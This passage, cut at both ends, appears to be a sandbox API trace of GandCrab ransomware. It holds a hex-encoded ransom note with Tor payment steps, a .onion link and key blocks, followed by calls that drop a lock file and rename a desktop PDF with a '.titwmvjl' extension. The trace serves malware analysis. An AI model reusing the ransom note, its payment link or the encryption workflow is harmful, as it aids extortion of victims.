2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0088.684] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0088.685] CloseHandle (hObject=0x2bc) returned 1 [0088.685] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.685] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.685] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x21, wMilliseconds=0x3e2)) [0088.685] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.685] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0088.685] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0088.686] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\d2ca4a09d2ca4deb61a.lock") returned 85 [0088.686] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0088.686] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.686] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.686] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\") returned 61 [0088.686] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\*" [0088.686] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503578 [0088.686] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.686] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.687] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.687] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.687] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.687] lstrcmpW (lpString1="binhcrzS3ARBF.pdf", lpString2=".") returned 1 [0088.687] lstrcmpW (lpString1="binhcrzS3ARBF.pdf", lpString2="..") returned 1 [0088.687] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="binhcrzS3ARBF.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf" [0088.687] lstrlenW (lpString=".titwmvjl") returned 9 [0088.687] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf") returned 78 [0088.687] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.687] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf.titwmvjl") returned 87 [0088.687] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf") returned 78 [0088.687] lstrlenW (lpString=".pdf") returned 4 [0088.687] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.687] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pdf ") returned 5 [0088.687] lstrcmpiW (lpString1=".pdf", lpString2=".titwmvjl") returned -1 [0088.687] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.687] lstrlenW 